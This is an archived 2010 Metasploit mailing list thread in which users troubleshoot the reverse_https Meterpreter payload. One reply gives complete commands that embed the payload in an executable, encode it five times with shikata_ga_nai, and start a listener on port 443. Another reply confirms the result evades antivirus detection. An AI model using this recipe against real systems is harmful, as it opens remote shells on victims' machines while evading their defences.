Metasploit mailing list archives
Re: windows/meterpreter/reverse_https still working
From: wfdawson <wfdawson () bellsouth net>
Date: Tue, 16 Nov 2010 13:24:17 -0800 (PST)
With the exception of "payload=shikata_ga_nai" mention on the msfcli line, I was happy to see that not only do the below steps avoid any detection by my AV, but it is also substantially faster to load than the equivalent multi-staged Meterpreter payload. Thanks for the tip! ________________________________ From: Marc Doudiet <marc.doudiet () gmail com> To: framework () spool metasploit com Sent: Tue, November 16, 2010 3:54:20 PM Subject: Re: [framework] windows/meterpreter/reverse_https still working Hi, I just used it today and it worked like a charm: ./msfpayload windows/meterpreter/reverse_https LHOST=xx.xx.xx.xx LPORT=443 R | ./msfencode -t exe -x test.exe -o test.exe -e x86/shikata_ga_nai -c 5 ./msfcli exploit/multi/handler payload=shikata_ga_nai lhost=xx.xx.xx.xx lport=443 payload=windows/meterpreter/reverse_https E hope this help. M On Nov 16, 2010, at 4:31 PM, Miguel Rios wrote: I've also had issues lately with windows/meterpreter/reverse_https where it seems to start the connection and then hangs with no error messages. Regular old reverse_http works without a hitch and obviously 443 is allowed through the firewall so I think it may be a problem with meterpreter itself. I'd appreciate it if others could give feedback if they're seeing the same issues with latest svned up metasploit before I spend an afternoon testing it further.
Thanks --- On Sat, 10/30/10, Jeffs <jeffs () speakeasy net> wrote:From: Jeffs <jeffs () speakeasy net> Subject: [framework] windows/meterpreter/reverse_https still working To: "framework () spool metasploit com" <framework () spool metasploit com> Date: Saturday, October 30, 2010, 12:42 PM Hello All, Does the windows/meterpreter/reverse_https still work in this day and age? I am having difficulty getting it to connect back to a IE 7 instance using the example here: http://blog.metasploit.com/2010/04/persistent-meterpreter-over-reverse.html I see through tcpdump that the connection is being requested but nothing happens in the exploit/multi/handler. Also, I cannot get the msfencode to work. Receive message no such file or directory "msfencode" even though I see it in plain sight. Thank you. -----Inline Attachment Follows----- _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- windows/meterpreter/reverse_https still working Jeffs (Oct 30)
- Re: windows/meterpreter/reverse_https still working Miguel Rios (Nov 16)
- Re: windows/meterpreter/reverse_https still working Marc Doudiet (Nov 16)
- Re: windows/meterpreter/reverse_https still working wfdawson (Nov 16)
- Re: windows/meterpreter/reverse_https still working Marc Doudiet (Nov 16)
- Re: windows/meterpreter/reverse_https still working Miguel Rios (Nov 16)